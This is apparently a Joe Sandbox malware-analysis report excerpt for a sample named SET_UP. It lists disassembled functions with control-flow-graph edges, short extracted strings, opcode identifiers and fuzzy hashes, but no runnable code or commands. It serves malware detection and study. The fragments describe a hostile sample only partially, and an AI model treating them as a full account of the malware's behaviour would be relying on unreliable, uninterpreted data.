                                                                                                                                            • Instruction Fuzzy Hash: 6C139A3150C7C18AE3259B3888943AEBFD1ABD6324F088E6DD5E9873D2D7788445CB5B
                                                                                                                                            Function 02538330 Relevance: 47.8, Strings: 38, Instructions: 308COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 882 2538330-253848e 883 2538490-2538493 882->883 884 25384c3-2538500 883->884 885 2538495-25384c1 883->885 886 2538502-2538505 884->886 885->883 887 2538507-253851c 886->887 888 253851e-2538588 886->888 887->886 889 253858a-253858d 888->889 890 25385d3-2538601 889->890 891 253858f-25385d1 889->891 892 2538603-2538606 890->892 891->889 893 2538608-253861d 892->893 894 253861f-253867b 892->894 893->892 895 253867d-2538680 894->895 896 2538682-25386a3 895->896 897 25386a5-25386c4 895->897 896->895 898 25386c6-25386c9 897->898 899 25386cb-253870d 898->899 900 253870f-2538712 898->900 899->898 901 2538714-253871a 900->901 902 2538721-2538733 901->902 903 253871c 901->903 905 2538737-253873d 902->905 906 2538735 902->906 904 25387af-25387d9 903->904 907 2538797-253879a 905->907 908 253873f-2538794 call 253f1b0 905->908 906->907 910 253879e-25387aa 907->910 911 253879c 907->911 908->907 910->901 911->904
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $"$&$'$($)$*$,$-$-$.$/$0$0$0$1$2$2$2$3$4$6$6$7$8$9$:$<$<$=$>$>$?$@$J$L$X$z
                                                                                                                                            • API String ID: 0-434540074
                                                                                                                                            • Opcode ID: bbe8b5945c93c7fe01e2a09f5012a1834117af991db320341471937a4c8a79f1
                                                                                                                                            • Instruction ID: 81db0f9076b4735a526b61190b0f00d35012a33a85d14f7fbc9c2376802e4374
                                                                                                                                            • Opcode Fuzzy Hash: bbe8b5945c93c7fe01e2a09f5012a1834117af991db320341471937a4c8a79f1
                                                                                                                                            • Instruction Fuzzy Hash: 75E1C2219087E98EDB26C77C88483CDBFB16B53224F1843D9D4E86B3D2D7750A46CB66
                                                                                                                                            Function 02525466 Relevance: 25.8, Strings: 20, Instructions: 791COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 916 2525466-252562b 917 2525630-2525647 916->917 917->917 918 2525649-25258f5 917->918 919 2525900-2525929 918->919 919->919 920 252592b-2525b1a 919->920 921 2525b20-2525b4f 920->921 921->921 922 2525b51-2525d3f 921->922 923 2525d40-2525d57 922->923 923->923 924 2525d59-2525f47 923->924 925 2525f50-2525f79 924->925 925->925 926 2525f7b-2526195 925->926 927 25261a0-25261b7 926->927 927->927 928 25261b9-2526465 927->928 929 2526470-2526499 928->929 929->929 930 252649b-252668a 929->930 931 2526690-25266bf 930->931 931->931 932 25266c1-25268af 931->932 933 25268b0-25268c7 932->933 933->933 934 25268c9-2526ab7 933->934 935 2526ac0-2526ae9 934->935 935->935 936 2526aeb-2526b3f 935->936
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 9^;$4O$A@$W=$`a$n)l+$nYm[$pj$xAzC$xI{K$|MzO$ &$,"$06$4*$8>$PV$tj$x~$x~
                                                                                                                                            • API String ID: 0-832761812
                                                                                                                                            • Opcode ID: f88da86a2897718c38f9c79cb25eeb3818ee125a641693974b99d4585c679e21
                                                                                                                                            • Instruction ID: 639cedbbf6f5afcf29c884528ea0640d2281ebe85296a61c356b56512e4d34c7
                                                                                                                                            • Opcode Fuzzy Hash: f88da86a2897718c38f9c79cb25eeb3818ee125a641693974b99d4585c679e21
                                                                                                                                            • Instruction Fuzzy Hash: D5A2C9B460D3C48AD334CF14C542BCFBAF1EB82344F40892DC6E95B256D7B6464A9B9B
                                                                                                                                            Function 02511078 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 950 2511078-2511090 951 2511092-2511095 950->951 952 2511097-25110d7 951->952 953 25110d9-25110f8 call 2503680 951->953 952->951 956 251135d 953->956 957 25110fe-2511116 953->957 958 251329d 956->958 959 2511118-251111b 957->959 962 251329f-25132ab call 2503780 958->962 960 2511166-2511185 call 2503680 959->960 961 251111d-2511164 959->961 960->956 967 251118b-25111a3 960->967 961->959 969 2510503-25132bc 962->969 970 251050c-2510534 call 2503790 962->970 971 25111a5-25111a8 967->971 980 2510536-2510539 970->980 972 25111aa-25111db 971->972 973 25111dd-25111fc call 2503680 971->973 972->971 973->956 981 2511202-251121a 973->981 982 2510563-251058b call 2503680 980->982 983 251053b-2510561 980->983 985 251121c-251121f 981->985 991 251058d-25105ae 982->991 992 251058f 982->992 983->980 987 2511221-2511236 985->987 988 2511238-2511257 call 2503680 985->988 987->985 988->956 995 251125d-2511275 988->995 996 25105b2-25105b5 991->996 992->962 997 2511277-251127a 995->997 998 2510602-2510653 call 25031c0 996->998 999 25105b7-2510600 996->999 1000 25112ab-25112ca call 2503680 997->1000 1001 251127c-25112a9 997->1001 998->958 1007 2510659 998->1007 999->996 1000->956 1006 25112d0-25112f6 1000->1006 1001->997 1008 25112f8-25112fb 1006->1008 1007->958 1009 251132b-2511355 call 2503680 1008->1009 1010 25112fd-2511329 1008->1010 1009->958 1013 251135b-251137a 1009->1013 1010->1008 1015 251137c-251137f 1013->1015 1016 2511381-25113b3 1015->1016 1017 25113b5-25113e8 call 25030c0 1015->1017 1016->1015 1020 25113ea-25113ed 1017->1020 1021 251141f-2511456 call 25030c0 1020->1021 1022 25113ef-251141d 1020->1022 1025 2511458-251145b 1021->1025 1022->1020 1026 2511461-25114e1 1025->1026 1027 25114e6-2511519 call 25032d0 1025->1027 1026->1025 1030 251151b-251151e 1027->1030 1031 2511520-2511542 1030->1031 1032 2511544-2511577 call 25030c0 1030->1032 1031->1030 1035 2511579-251157c 1032->1035 1036 25115a5-251161e call 25031c0 1035->1036 1037 251157e-25115a3 1035->1037 1040 2511620-2511623 1036->1040 1037->1035 1041 2511642-25116c0 call 25031c0 call 2515470 1040->1041 1042 2511625-2511640 1040->1042 1047 25116c2 1041->1047 1048 25116c4-2511755 call 2509900 call 250c000 call 253d470 call 2509910 call 253d6f0 1041->1048 1042->1040 1047->1048 1059 2511757 1048->1059 1060 251175c-25117a3 1048->1060 1061 2511ddd-2511ded call 253d880 1059->1061 1062 25117a5-25117a8 1060->1062 1061->958 1063 25117db-25117e2 1062->1063 1064 25117aa-25117d9 1062->1064 1066 25117e4-25117ef 1063->1066 1064->1062 1068 25117f1 1066->1068 1069 25117f6-251180f 1066->1069 1070 2511881-2511888 1068->1070 1071 2511811 1069->1071 1072 2511813-2511819 1069->1072 1073 251188a 1070->1073 1074 251188c-25118ba 1070->1074 1075 2511870-2511875 1071->1075 1076 2511822-251186b call 253f1b0 1072->1076 1077 251181b-2511820 1072->1077 1073->1074 1081 25118bc-25118bf 1074->1081 1079 2511877 1075->1079 1080 2511879-251187c 1075->1080 1076->1075 1077->1075 1079->1070 1080->1066 1083 25118c1-25118f0 1081->1083 1084 25118f2-25118fb 1081->1084 1083->1081 1085 2511901-251196a call 253d420 1084->1085 1086 2511dda 1084->1086 1089 251196c-251196f 1085->1089 1086->1061 1090 2511971-25119a0 1089->1090 1091 25119a2-25119b0 1089->1091 1090->1089 1092 25119b2-25119bd 1091->1092 1093 25119c4-25119d9 1092->1093 1094 25119bf 1092->1094 1096 25119db 1093->1096 1097 25119dd-25119ed 1093->1097 1095 2511a48-2511a52 1094->1095 1100 2511a54 1095->1100 1101 2511a56-2511a59 1095->1101 1098 2511a39-2511a3c 1096->1098 1097->1098 1099 25119ef-2511a34 call 253f1b0 1097->1099 1105 2511a40-2511a43 1098->1105 1106 2511a3e 1098->1106 1099->1098 1100->1101 1102 2511dc7-2511dd6 call 253d440 1101->1102 1103 2511a5f-2511aa9 call 2515470 1101->1103 1102->1086 1112 2511aab 1103->1112 1113 2511aad-2511b11 call 2509900 call 250c000 1103->1113 1105->1092 1106->1095 1112->1113 1118 2511b13-2511b15 1113->1118 1119 2511b17-2511b23 1118->1119 1120 2511b2e-2511b30 1118->1120 1121 2511b25-2511b2c 1119->1121 1122 2511b27 1119->1122 1123 2511b32-2511b7d 1120->1123 1121->1118 1122->1123 1124 2511b81-2511be0 call 2509900 call 25154d0 call 250b240 call 2509910 1123->1124 1125 2511b7f 1123->1125 1135 2511be2 1124->1135 1136 2511be4-2511c45 call 2509900 call 253b290 call 2509910 call 2515470 1124->1136 1125->1124 1135->1136 1147 2511c47 1136->1147 1148 2511c49-2511c91 call 2509900 call 250c000 call 250a220 1136->1148 1147->1148 1155 2511c93-2511ca4 call 2503780 1148->1155 1158 2511ca6-2511dc2 call 2509910 * 2 call 250ae10 call 250a300 1155->1158 1159 2511cab-2511cc4 call 2503760 call 25031a0 1155->1159 1158->1102 1168 2511cc6 1159->1168 1169 2511ccb-2511cec call 2515470 1159->1169 1171 2511d79-2511d84 1168->1171 1176 2511cf0-2511d77 call 2509900 call 250c000 call 2522120 call 2509910 1169->1176 1177 2511cee 1169->1177 1171->1155 1176->1171 1177->1176
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: +$+$,$-$.$:$?$N$b$f$f$i$l$v
                                                                                                                                            • API String ID: 0-397903110
                                                                                                                                            • Opcode ID: e03532ba04dbf17b6f32a386bb26a61e3e1756ae3b5aa20e62f5f29cf1fb7916
                                                                                                                                            • Instruction ID: 65c8e9c043a4db3fe8a81f6ab43dccf38a8867c3cdaa2daffe571f7467a99dea
                                                                                                                                            • Opcode Fuzzy Hash: e03532ba04dbf17b6f32a386bb26a61e3e1756ae3b5aa20e62f5f29cf1fb7916
                                                                                                                                            • Instruction Fuzzy Hash: 2B827C7160CB818BD3289B38C4943AEBBE2BBC9314F198E6DD5DA873D1DA748545CB07
                                                                                                                                            Function 025209E7 Relevance: 16.7, Strings: 13, Instructions: 424COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1193 25209e7-2520aaa call 2515890 1196 2520aac-2520aaf 1193->1196 1197 2520ab1-2520ac4 1196->1197 1198 2520ac6-2520b46 call 25158a0 1196->1198 1197->1196 1201 2520b48-2520b4b 1198->1201 1202 2520b62-2520c1b call 25158a0 1201->1202 1203 2520b4d-2520b60 1201->1203 1206 2520c1d-2520c20 1202->1206 1203->1201 1207 2520c22-2520c44 1206->1207 1208 2520c46-2520dae call 25158a0 1206->1208 1207->1206 1211 2520db0-2520db3 1208->1211 1212 2520db5-2520ddb 1211->1212 1213 2520ddd-2520ebe call 25158a0 1211->1213 1212->1211 1216 2520ec0-2520ec3 1213->1216 1217 2520ec5-2520f0c 1216->1217 1218 2520f0e-2520f54 call 25158a0 1216->1218 1217->1216
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $"$$$&$($*$,$.$4$8$<$>$G
                                                                                                                                            • API String ID: 0-747527269
                                                                                                                                            • Opcode ID: 57562f8241f462db47a9093afd7393ae8bd006bb2ca9aad671c38d73d7bde821
                                                                                                                                            • Instruction ID: f12afe5989d412080e239766d63fdac57b994706e43a3f1461e4f9d548e619fb
                                                                                                                                            • Opcode Fuzzy Hash: 57562f8241f462db47a9093afd7393ae8bd006bb2ca9aad671c38d73d7bde821
                                                                                                                                            • Instruction Fuzzy Hash: 75122561508BC18EE326CB3C8848A46BFD16B67234F09C7D9E4F98F3E7D2659106C766
                                                                                                                                            Function 02537D6F Relevance: 15.2, Strings: 12, Instructions: 189COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$&$+$4$5$5$H$I$h$i$m$o
                                                                                                                                            • API String ID: 0-1055871813
                                                                                                                                            • Opcode ID: 656b777705db2729c17918ffb7b1babcc1b1b4eb9181cce4d32374eeba699382
                                                                                                                                            • Instruction ID: ed1ae693c3b29a5712acfc34f44128e28f44b2978d76b95d72fed8db470d0cc4
                                                                                                                                            • Opcode Fuzzy Hash: 656b777705db2729c17918ffb7b1babcc1b1b4eb9181cce4d32374eeba699382
                                                                                                                                            • Instruction Fuzzy Hash: 93811671D083998FDB22CF78C8843DDBFB16B4A320F1846A9C495AB3C2C7744A46CB55
                                                                                                                                            Function 0251F210 Relevance: 14.6, Strings: 11, Instructions: 896COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6Cjz$9?$I$L@EE$MKYT$OVK[$Q$$WCSW$Z[CD$czgw$w
                                                                                                                                            • API String ID: 0-629887381
                                                                                                                                            • Opcode ID: 2071a489371ba7525243ad9c26ff3fe2ce247680536b0ee0bbe1b05af0c76151
                                                                                                                                            • Instruction ID: c18491af1c7152fa947813f665e6801881ce1bec173dd00bdc47abe53924bacc
                                                                                                                                            • Opcode Fuzzy Hash: 2071a489371ba7525243ad9c26ff3fe2ce247680536b0ee0bbe1b05af0c76151
                                                                                                                                            • Instruction Fuzzy Hash: 7852577050C3818FD725DF28C85066EBFE2BF86318F188A6CE8E94B792D7358506CB56
                                                                                                                                            Function 025127EE Relevance: 13.0, Strings: 10, Instructions: 550COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$2$6$P$Z$b$i$j$o${
                                                                                                                                            • API String ID: 0-3767312495
                                                                                                                                            • Opcode ID: e844937ded1b119210b7652b8071f029d5add71d0ebc520f8143060358988dbb
                                                                                                                                            • Instruction ID: 9ae56f22a76072bce2b884036a0f3ff73f609ab6658256328851be283cf13116
                                                                                                                                            • Opcode Fuzzy Hash: e844937ded1b119210b7652b8071f029d5add71d0ebc520f8143060358988dbb
                                                                                                                                            • Instruction Fuzzy Hash: 1A22AF7160C7918BE7249F38C8813AEBBD2ABC4324F198E2ED9D9C73D1D6788545CB46
                                                                                                                                            Function 0250A690 Relevance: 11.5, Strings: 9, Instructions: 256COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $_$-$cX?v$ndn-$q?Ga$srb~$uG[E$vfdk$|nzc
                                                                                                                                            • API String ID: 0-2482235978
                                                                                                                                            • Opcode ID: 833e9d7832c33974310b6282963fba8c1f8a1d80212765be31ff528a5ee5e842
                                                                                                                                            • Instruction ID: d6205279d1b39caaec72bdc535936655b094a28177175d6ec868eae7b220249d
                                                                                                                                            • Opcode Fuzzy Hash: 833e9d7832c33974310b6282963fba8c1f8a1d80212765be31ff528a5ee5e842
                                                                                                                                            • Instruction Fuzzy Hash: 7E711A6150C3C28BD306CF3989A4367FFE1AF93214F28496DE5D59B292D734C50A879E
                                                                                                                                            Function 0250AE10 Relevance: 10.3, Strings: 8, Instructions: 331COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0$5+/@$;8$?vWt$i$b0`$nl$zx
                                                                                                                                            • API String ID: 0-901918283
                                                                                                                                            • Opcode ID: 6e96af0b4563233f8c0e633c46a21359e92ae84037ee6e151455cdf11e7e571f
                                                                                                                                            • Instruction ID: 9e8f4a3401b15ab3f848e28019752f6af8055f1552425a621674d5d45e5a622b
                                                                                                                                            • Opcode Fuzzy Hash: 6e96af0b4563233f8c0e633c46a21359e92ae84037ee6e151455cdf11e7e571f
                                                                                                                                            • Instruction Fuzzy Hash: CFB104B16083408BD718DF65D891AAFBBF5EF91318F144C2DE1D28B292D738D50ACB1A
                                                                                                                                            Function 02539FA0 Relevance: 7.0, Strings: 5, Instructions: 710COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #701$:$Z[$\${x
                                                                                                                                            • API String ID: 0-2664114237
                                                                                                                                            • Opcode ID: c6ed1817fcd795800678a3cf37abaf87294a8652f0ac0b6689b5f1805dd64f1e
                                                                                                                                            • Instruction ID: 6ad73e90c787f643fca980fd52ef76ca7ea937c3a9a03fc4e9ee27e90757f1ee
                                                                                                                                            • Opcode Fuzzy Hash: c6ed1817fcd795800678a3cf37abaf87294a8652f0ac0b6689b5f1805dd64f1e
                                                                                                                                            • Instruction Fuzzy Hash: C522DC71A083408BE711CF29C880B6BBBE5FBC5714F148A2CE9D69B3A1D375D845CB96
                                                                                                                                            Function 02523BB2 Relevance: 6.6, Strings: 5, Instructions: 342COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #cXo$HQ\-$W_$v$~q
                                                                                                                                            • API String ID: 0-1300196144
                                                                                                                                            • Opcode ID: b0823a0a96bae4f8ee61def52de38eade0599d46e12c91127333d77ff41fa1e5
                                                                                                                                            • Instruction ID: 6e5af4ccc1635d01ea715f7e3dd28be72853121b6e21cca78a7fe229af86aa79
                                                                                                                                            • Opcode Fuzzy Hash: b0823a0a96bae4f8ee61def52de38eade0599d46e12c91127333d77ff41fa1e5
                                                                                                                                            • Instruction Fuzzy Hash: 9BA1E0B514C3908FD325CF69989039BBFE2EFD2248F18896CE4D54B391D7B984098B97
                                                                                                                                            Function 0250A910 Relevance: 5.5, Strings: 4, Instructions: 464COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: h$(,..$YT$]_[
                                                                                                                                            • API String ID: 0-739460008
                                                                                                                                            • Opcode ID: 2c3247610f00ee4376cf5dda08f0336ad92fca5439f1b4266d765d1f2b4ee5ef
                                                                                                                                            • Instruction ID: 3a5767c6964192ae8ea33dd4bc374a54b3f30970d7173e56a2de89e58baba085
                                                                                                                                            • Opcode Fuzzy Hash: 2c3247610f00ee4376cf5dda08f0336ad92fca5439f1b4266d765d1f2b4ee5ef
                                                                                                                                            • Instruction Fuzzy Hash: 03D1077250C3914AC722CF69889036BFFE1AF97204F49899DE8D59B383C765C606C796
                                                                                                                                            Function 0252AA45 Relevance: 5.4, Strings: 4, Instructions: 352COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: *pht$bXbg$cnq|$gfff
                                                                                                                                            • API String ID: 0-3456897479
                                                                                                                                            • Opcode ID: 4706c6b2267db1052d5e89a2dfa831f34d2e1d3a0d5c694a362855392d28a9f4
                                                                                                                                            • Instruction ID: 006bc7fa16db753405db7a92339a0a42a3821ef7cc2beee768f1d88f60687c7e
                                                                                                                                            • Opcode Fuzzy Hash: 4706c6b2267db1052d5e89a2dfa831f34d2e1d3a0d5c694a362855392d28a9f4
                                                                                                                                            • Instruction Fuzzy Hash: E4C105B15083915BD724CF28C88175BBBE2BFC5204F498A2DE5E5872C2E675D909CB86
                                                                                                                                            Function 025275B0 Relevance: 5.2, Strings: 4, Instructions: 227COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 52$GD$NE$RP
                                                                                                                                            • API String ID: 0-2393743575
                                                                                                                                            • Opcode ID: 8547b414ddb18c80f1c8dfa85b03eed9bd37b00a8b575c02a3e3b425f792cdfc
                                                                                                                                            • Instruction ID: 559c48afe9d2fc3914b2e60deee6ea60321132f1bd0aae0ab08632065bb49629
                                                                                                                                            • Opcode Fuzzy Hash: 8547b414ddb18c80f1c8dfa85b03eed9bd37b00a8b575c02a3e3b425f792cdfc
                                                                                                                                            • Instruction Fuzzy Hash: A87103B15083108BD314DF25C89166BBBE2FFC6364F198A1CE4C54B3E5E778950ACB9A
                                                                                                                                            Function 0252D5F3 Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: )I5~$)I5~$>5J<$M tr
                                                                                                                                            • API String ID: 0-1194712161
                                                                                                                                            • Opcode ID: 774cc7f2204193a2be935a81550da21e085adc75278f20b1285f7c39e3a7fc60
                                                                                                                                            • Instruction ID: 392f427c824e7ffdf95bfc05e7c45a0bdf884c2290df1dd01fae35ccfa2982b5
                                                                                                                                            • Opcode Fuzzy Hash: 774cc7f2204193a2be935a81550da21e085adc75278f20b1285f7c39e3a7fc60
                                                                                                                                            • Instruction Fuzzy Hash: A0511A2665A7914BDB398F3988547FBBFD3ABD3214F2D856DC0D98B6C6CB3840068705
                                                                                                                                            Function 0250E71B Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Cu$D$s|$64
                                                                                                                                            • API String ID: 0-114610215
                                                                                                                                            • Opcode ID: f44d326dd7157d5f1760cf49ff8ba8b9bb4523abe1ac0d85a7f0d9b1927c0bfe
                                                                                                                                            • Instruction ID: 1dcb4a48f8ef2a6fc6c301acb5cfa19f77050cac818e6c4c078df8a86d2c246b
                                                                                                                                            • Opcode Fuzzy Hash: f44d326dd7157d5f1760cf49ff8ba8b9bb4523abe1ac0d85a7f0d9b1927c0bfe
                                                                                                                                            • Instruction Fuzzy Hash: C55110B05093818FE3248F55C8A576BBBF1FB81348F245D1CE6D64B2A0D7B98549CF8A
                                                                                                                                            Function 02534C80 Relevance: 5.1, Strings: 4, Instructions: 147COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ($+$-$@
                                                                                                                                            • API String ID: 0-3554917468
                                                                                                                                            • Opcode ID: 24313b5a37689e8936544daffa94b5c596c81985becaa12e0608c84b96a4080c
                                                                                                                                            • Instruction ID: fbda170ebb71554f0dbe978db407d195e874809efa787ee8affa86fd44ca12eb
                                                                                                                                            • Opcode Fuzzy Hash: 24313b5a37689e8936544daffa94b5c596c81985becaa12e0608c84b96a4080c
                                                                                                                                            • Instruction Fuzzy Hash: C551CF7150C7458FD301AF78984836FBFE1ABC6224F084A2DE4E5872D1EB788649D75B
                                                                                                                                            Function 025289B0 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 'j7h$+r>p$2v6t$>n<l
                                                                                                                                            • API String ID: 0-1878794915
                                                                                                                                            • Opcode ID: fa5bec06a2b97c5185bf2330354a085bac63f3cc4562cb41358c5a0931cc435c
                                                                                                                                            • Instruction ID: 838596099f012e2bad72ea24f480b0f1975405f4dd3958072230b611113ce673
                                                                                                                                            • Opcode Fuzzy Hash: fa5bec06a2b97c5185bf2330354a085bac63f3cc4562cb41358c5a0931cc435c
                                                                                                                                            • Instruction Fuzzy Hash: A841D1B29083908FD334CF258851B9BBAE2EBC1304F55992CD0C99B245C7748906CB8B
